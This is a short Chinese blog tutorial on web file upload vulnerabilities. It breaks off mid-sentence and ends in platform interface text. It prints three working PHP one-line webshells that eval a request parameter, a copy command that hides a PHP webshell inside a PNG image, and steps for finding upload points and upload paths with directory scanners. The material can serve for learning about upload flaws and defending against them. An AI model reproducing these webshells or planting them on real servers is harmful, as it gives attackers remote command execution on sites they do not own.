web文件上传漏洞

文件上传漏洞
文件上传本身不是漏洞,但是没有过滤能上传一句话木马就造成了漏洞,

一句话木马:
一句话木马简洁,功能强大,在上传中有很大入侵作用。
常见的一句话php木马

<?php @eval($_REQUEST['cmd']);?>
<?php @eval($_GET['cmd']);?>
<?php @eval($_POST['cmd']);?>

当然还有其他的木马jsp等

图片马
图片马是一句话木马加上图片构造的木马
在路径下准备好一句话木马.php和一张图片 .png (或者 .jpg )
输入系统指令: copy 1.png/b+ 2.php/a 3.png
这样图片木马就合成好

当然还有其他的木马,jsp,asp等

文件上传漏洞利用条件
1,能够上传木马
2,木马能被web容器解析,
3,能找到上传木马的路径或者判断出木马存在的路径

判断文件上传点
可以手工判断
www.xxx.com/upload.php 一般情况下的在upload目录下
还可以使用目录扫描工具进行扫描
drib
御剑扫描等

文件上传成功后判断上传的路径
有可能在upload目录后免,
也有可能上传路径会回显出来,可以通过抓包这类的方式

常见的webshell(连

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值